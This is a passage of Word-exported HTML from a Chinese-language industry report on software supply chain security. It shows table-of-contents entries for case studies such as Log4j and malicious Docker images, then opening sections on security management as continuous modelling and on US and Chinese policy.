style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">技术：高级扫描套件：精准识别可利用漏洞</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">技术：构建软件依赖关系树</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span>        <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">技术：从传统被动扫描到制品主动管理</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">- </span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">3. </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">软件供应链安全厂商的发展策略与市场趋势</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">核心观点：安全扫描工具不是软件供应链工具</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">从制品库到全方位软件供应链安全平台</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">从包管理起家到软件供应链安全的领军者</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">并购安全公司的核心逻辑</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">- </span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4. </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">软件供应链安全威胁与典型案例分析</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">案例：核弹级</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">Apache log4j</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">漏洞</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">数据：</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">DockerHub</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">恶意镜像比例</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">30%</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">案例：利用搜索引擎欺骗用户下载恶意</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">Docker</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">案例：电子书钓鱼陷阱</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">Docker</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">案例：开源代码仓库中的敏感信息泄露问题</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">案例：</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">AI</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">模型</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">Hugging Face</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">暗藏攻击</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">数据：安全漏洞修复需要投入</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">25%</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">的事件</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">数据：开源语言包增长趋势</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"> </span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">1. </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">软件供应链安全管理策略与最佳实践</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">安全永远在建模！</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;软件供应链安全是一个持续的过程&#34;</span></p><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 安全永远处于建模过程中，需要持续评估和调整</span></section><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 安全投入需要根据资产价值、潜在损失等因素进行建模评估</span></section><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 在开发早期解决安全问题可让团队更专注创新</span></section><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 平衡安全投入与业务发展，根据企业特点制定策略</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">突出了安全管理中持续的建模过程，从数据收集、模型构建、模型验证、模型应用再到模型更新，形成一个不断循环的过程。它强调了安全不是一个静态的概念，而是需要通过持续的建模来适应不断变化的安全环境和威胁格局。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">中美政策</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">- 美国NIST制定通信产业供应链安全标准，推动SBOM概念</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 中国信通院推动软件供应链安全能力评估模型，央行对金融企业开源技术应用提出指导意见</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">未来发展趋势</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: 